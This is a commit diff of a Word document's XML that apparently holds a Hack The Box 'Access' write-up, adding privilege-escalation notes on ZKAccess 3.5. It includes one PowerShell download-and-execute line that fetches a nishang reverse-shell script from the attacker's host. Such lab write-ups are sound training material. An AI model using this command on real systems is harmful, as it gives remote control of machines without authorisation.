<commit_message>
Updated Access writeup as it was unfinished
Access updated
</commit_message>
<xml_diff>
--- a/Access/Access.docx
+++ b/Access/Access.docx
@@ -553,12 +553,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5810250" cy="3746500"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="11" name="image11.png"/>
+                  <wp:docPr id="19" name="image19.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image11.png"/>
+                          <pic:cNvPr id="0" name="image19.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -820,12 +820,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5514975" cy="2295525"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="7" name="image14.png"/>
+                  <wp:docPr id="5" name="image9.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image14.png"/>
+                          <pic:cNvPr id="0" name="image9.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -999,12 +999,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5181600" cy="1476375"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="18" name="image18.png"/>
+                  <wp:docPr id="24" name="image25.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image18.png"/>
+                          <pic:cNvPr id="0" name="image25.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -1314,12 +1314,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5324475" cy="3752850"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="3" name="image13.png"/>
+                  <wp:docPr id="3" name="image15.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image13.png"/>
+                          <pic:cNvPr id="0" name="image15.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -1557,12 +1557,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="4400550" cy="476250"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="5" name="image7.png"/>
+                  <wp:docPr id="13" name="image2.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image7.png"/>
+                          <pic:cNvPr id="0" name="image2.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -1798,12 +1798,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="4733925" cy="361950"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="10" name="image5.png"/>
+                  <wp:docPr id="18" name="image16.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image5.png"/>
+                          <pic:cNvPr id="0" name="image16.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -1895,12 +1895,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="1571625" cy="523875"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="6" name="image1.png"/>
+                  <wp:docPr id="14" name="image6.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image1.png"/>
+                          <pic:cNvPr id="0" name="image6.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -2190,12 +2190,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5505450" cy="4953000"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="1" name="image16.png"/>
+                  <wp:docPr id="1" name="image12.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image16.png"/>
+                          <pic:cNvPr id="0" name="image12.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -2360,7 +2360,7 @@
           <w:szCs w:val="24"/>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Before we continue, we will go back to the database file we fould earlier and go through it.</w:t>
+        <w:t xml:space="preserve">Before we continue, we will go back to the database file we found earlier and go through it.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2439,12 +2439,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="3895725" cy="381000"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="4" name="image15.png"/>
+                  <wp:docPr id="12" name="image3.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image15.png"/>
+                          <pic:cNvPr id="0" name="image3.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -2494,12 +2494,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="2505075" cy="1990725"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="14" name="image12.png"/>
+                  <wp:docPr id="22" name="image22.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image12.png"/>
+                          <pic:cNvPr id="0" name="image22.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -2712,12 +2712,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5810250" cy="736600"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="16" name="image3.png"/>
+                  <wp:docPr id="10" name="image5.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image3.png"/>
+                          <pic:cNvPr id="0" name="image5.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -2955,12 +2955,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="4276725" cy="333375"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="8" name="image2.png"/>
+                  <wp:docPr id="15" name="image14.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image2.png"/>
+                          <pic:cNvPr id="0" name="image14.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -3052,12 +3052,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="1819275" cy="2743200"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="19" name="image6.png"/>
+                  <wp:docPr id="25" name="image23.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image6.png"/>
+                          <pic:cNvPr id="0" name="image23.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -3331,12 +3331,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="4591050" cy="952500"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="12" name="image10.png"/>
+                  <wp:docPr id="7" name="image8.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image10.png"/>
+                          <pic:cNvPr id="0" name="image8.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -3562,12 +3562,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="4010025" cy="438150"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="17" name="image9.png"/>
+                  <wp:docPr id="23" name="image21.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image9.png"/>
+                          <pic:cNvPr id="0" name="image21.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -3741,12 +3741,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5057775" cy="1428750"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="2" name="image19.png"/>
+                  <wp:docPr id="2" name="image1.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image19.png"/>
+                          <pic:cNvPr id="0" name="image1.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -3984,12 +3984,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5810250" cy="2641600"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="13" name="image4.png"/>
+                  <wp:docPr id="21" name="image24.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image4.png"/>
+                          <pic:cNvPr id="0" name="image24.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -4227,12 +4227,12 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="3257550" cy="2114550"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="9" name="image8.png"/>
+                  <wp:docPr id="17" name="image20.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image8.png"/>
+                          <pic:cNvPr id="0" name="image20.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -4356,6 +4356,265 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">From here we can use nishang to send back a better reverse shell to us since telnet is slow. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table16"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="5810250" cy="152400"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="6" name="image18.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image18.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId24"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5810250" cy="152400"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">powershell IEX(new-object net.webclient).downloadstring('http://10.10.14.25:8000/Rev-9001.ps1')</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:br w:type="page"/>
       </w:r>
       <w:r>
@@ -4382,7 +4641,7 @@
           <w:szCs w:val="24"/>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Security: Enumeration</w:t>
+        <w:t xml:space="preserve">Privilege Escalation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4480,7 +4739,7 @@
           <w:szCs w:val="24"/>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Going to the main C:\ drive, we notice a directory called “ZKTeco.” Heading into this folder shows a progra mcalled “ZKAccess” is installed with version 3.5. Doing a quick searchsploit query for this software, we find two potential vulnerabilities, only one of which may be useful to us. </w:t>
+        <w:t xml:space="preserve">Going to the main C:\ drive, we notice a directory called “ZKTeco.” Heading into this folder shows a program called “ZKAccess” is installed with version 3.5. Doing a quick searchsploit query for this software, we find two potential vulnerabilities, only one of which may be useful to us. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4501,7 +4760,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="Table16"/>
+        <w:tblStyle w:val="Table17"/>
         <w:tblW w:w="9360.0" w:type="dxa"/>
         <w:jc w:val="center"/>
         <w:tblBorders>
@@ -4572,16 +4831,16 @@
                 <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                   <wp:extent cx="5810250" cy="1104900"/>
                   <wp:effectExtent b="0" l="0" r="0" t="0"/>
-                  <wp:docPr id="15" name="image17.png"/>
+                  <wp:docPr id="8" name="image4.png"/>
                   <a:graphic>
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic>
                         <pic:nvPicPr>
-                          <pic:cNvPr id="0" name="image17.png"/>
+                          <pic:cNvPr id="0" name="image4.png"/>
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId24"/>
+                          <a:blip r:embed="rId25"/>
                           <a:srcRect b="0" l="0" r="0" t="0"/>
                           <a:stretch>
                             <a:fillRect/>
@@ -4621,17 +4880,1180 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This would be useful for us, however, we do not know if our ZKAccess is version 3.5.3. All we know is it is version 3.5. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Going back to enumerating, we find a couple hidden directories in the Public user’s folder. Desktop was one of these.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pageBreakBefore w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table18"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
